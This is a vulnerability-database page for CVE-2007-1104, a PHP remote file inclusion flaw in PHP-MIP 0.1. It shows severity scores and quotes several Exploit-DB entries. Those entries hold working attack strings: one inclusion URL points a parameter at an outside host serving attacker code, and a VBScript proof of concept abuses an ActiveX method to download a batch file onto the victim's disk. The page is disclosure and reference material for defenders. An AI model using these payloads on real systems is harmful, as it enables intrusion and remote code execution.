CVE-2007-1104
Published 2007-02-26
CVE-2007-1104: PHP remote file inclusion vulnerability in top.php in PHP Module Implementation (PHP-MIP) 0.1 allows remote attackers to execute arbitrary PHP code via a URL…
Priority: P4 · 31 · medium · 4.3 · CVSS 2.0
AV:N/AC:M/Au:N/C:N/I:P/A:N
EXPLOIT
EPSS: 2.32% (81.3th percentile)
PHP remote file inclusion vulnerability in top.php in PHP Module Implementation (PHP-MIP) 0.1 allows remote attackers to execute arbitrary PHP code via a URL in the laypath parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| php_mip | php_mip | — | — |
No detection rules found.
Exploit-DB
Apple iOS 7.0.2 - Sim Lock Screen Display Bypass
exploitdb·2013-10-15
CVE-2013-5147 Apple iOS 7.0.2 - Sim Lock Screen Display Bypass
---
Document Title:
Apple iOS 7.2 - Sim Lock Screen Display Bypass Vulnerability
References (Source):
http://www.vulnerability-lab.com/get_content.php?id=1105
Video: http://www.vulnerability-lab.com/get_content.php?id=1104
Release Date:
2013-10-04
Vulnerability Laboratory ID (VL-ID):
1105
Common Vulnerability Scoring System:
6.1
Product & Service Introduction:
iOS (previously iPhone OS) is a mobile operating system developed and distributed by Apple Inc. Originally unveiled in 2007
for the iPhone, it has been extended to support other Apple devices such as the iPod Touch (September 2007), iPad (January 2010),
iPad Mini (November 2012) and second-generation Apple TV (September 2010). Unlike Microsoft`s Windows Phone and Google`s
Exploit-DB
EDraw Flowchart ActiveX Control 2.0 - Insecure Method
exploitdb·2007-11-02
CVE-2007-5826 EDraw Flowchart ActiveX Control 2.0 - Insecure Method
---
EDraw Flowchart ActiveX Control (EDImage.ocx v. 2.0.2005.1104) "HttpDownloadFile()" Insecure Method
url: http://www.anydraw.com
Author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
This was written for educational purpose. Use it at your own risk.
Author will be not responsible for any damage.
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
Sub tryMe
On Error Resume Next
test.HttpDownloadFile "http://www.shinnai.altervista.org/shinnai.bat", "c:\shinnai.bat"
MsgBox("Exploit completed!")
End Sub
# milw0rm.com [2007-11-02]
Exploit-DB
PHP-MIP 0.1 - 'top.php?laypath' Remote File Inclusion
exploitdb·2007-02-25
CVE-2007-1104 PHP-MIP 0.1 - 'top.php?laypath' Remote File Inclusion
---
PHP Module Implementation(top.php laypath)Remote File Include Vul
Download S : http://sourceforge.net/projects/phpmip/
Author: GolD_M = [Mahmood_ali] && Contact: [email protected]
In: /[path]/top.php
Vulnerable Code:
include("$laypath/body.php"); Line : 23
Exploit:
http://Victim.Com/top.php?laypath=[Shell]
# milw0rm.com [2007-02-25]
Exploit-DB
PHPMyphorum 1.5a - '/mep/frame.php' Remote File Inclusion
exploitdb·2007-01-17
CVE-2007-0361 PHPMyphorum 1.5a - '/mep/frame.php' Remote File Inclusion
---
#########################################################################
# #
# [ PHPMyphorum 1.5a ] #
# #
# Class: File Include Vulnerability #
# Published 2007/1/17 #
# Remote: Yes #
# Critical Level : Dangerous #
# Site: http://www.comscripts.com/scripts/php.phpmyphorum.1104.html#
# Author: TheViper-hacker #
# Contact: [email protected] #
# #
#########################################################################
file ;
frame.php
Vuln Code
include("$chem/session/cookie_sys_verif.php");
Exploit :
Http:// www.Victem.0 / [Comment IT_path] /mep/frame.php?chem=http://turnkringonzehoop.be/viper.txt?
---- Thanx: [MoHaNdKo] [Cold ThreE] [cold zero] [The Wolf KSA] ]organza[
---- GreeTz: All www.4azhar.Com Members Cont
No writeups or analysis indexed.
http://osvdb.org/36881
http://www.securityfocus.com/bid/22714
http://www.vupen.com/english/advisories/2007/0732
https://exchange.xforce.ibmcloud.com/vulnerabilities/32672
https://www.exploit-db.com/exploits/3374
2007-02-26
Published